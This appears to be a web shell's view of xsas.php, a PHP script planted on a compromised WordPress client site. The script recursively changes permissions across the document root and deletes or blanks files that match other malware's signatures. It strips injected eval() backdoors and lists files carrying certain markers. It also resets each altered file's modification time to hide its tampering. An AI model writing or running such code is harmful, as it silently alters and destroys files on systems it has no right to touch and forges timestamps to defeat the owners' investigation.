Current Path : /var/www/html/clients/amz.e-nk.ru/ |
Current File : /var/www/html/clients/amz.e-nk.ru/xsas.php |
<?php session_start();$_SESSION['secretyt'] = true; if(function_exists("opcache_reset"))opcache_reset(); set_time_limit(0); ignore_user_abort(true); function listFolders($dir){ if(!is_writable($dir))@chmod($dir, 0755); $ffs = scandir($dir); foreach($ffs as $ff){ if($ff == "." || $ff == "..") continue; $d = $dir."/".$ff; if(is_dir($d)) { listFolders($d); }else{ handle($dir,$d); }; } } function handle($dir,$f){ if(!is_writable($dir))@chmod($dir, 0755); if(!is_writable($f))@chmod($f, 0644); if(strpos($f,"wp-includes/edit.php")!==false){ file_put_contents($f,""); @unlink($f); return; } $d = file_get_contents($f); if(preg_match("@listFolders@i",$d)){ return; } if(strpos($d,"0555")!==false || strpos($d,"paypal.gif")!==false){ echo $f."<br>"; return; } if(preg_match("@<\?php.+?\">ok<\".+?\?>|b66bb6bbb|<\?php.+?goto.+?CHnzG: \}|^<\?php.+?goto \w+@im", $d)){ if(!is_writable($dir))@chmod($dir, 0755); if(!is_writable($f))@chmod($f, 0644); if(!@unlink($f)){ $zip = new ZipArchive; $zip->open($f, ZipArchive::OVERWRITE); $zip->close(); }; if(file_exists($f)){ file_put_contents($f,""); } } if(!preg_match("@^<\?php.+?goto |<\?php.+?goto.+?\?>@im", $d)){ return; } $d = preg_replace("@<\?php.+?goto.+?\?>@im","", $d); if(preg_match('#\@eval\(\$_SERVER\[\'HTTP_\w+\']\);#i', $d)){ $d = preg_replace('#\@eval\(\$_SERVER\[\'HTTP_\w+\']\);#i',"", $d); } if(preg_match('#eval\(#', $d)){ echo $f."<br>"; } $d = str_replace('@eval($_SERVER', '//@eval($_SERVER', $d); $t = @filemtime($f); @file_put_contents($f, trim($d)); @tOuch($f, $t, $t); } try { $f = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/"; if(file_exists($f."edit.php")){ handle($f,$f."edit.php"); } listFolders($_SERVER["DOCUMENT_ROOT"]); }catch(Exception $e){ echo $e->getMessage(); }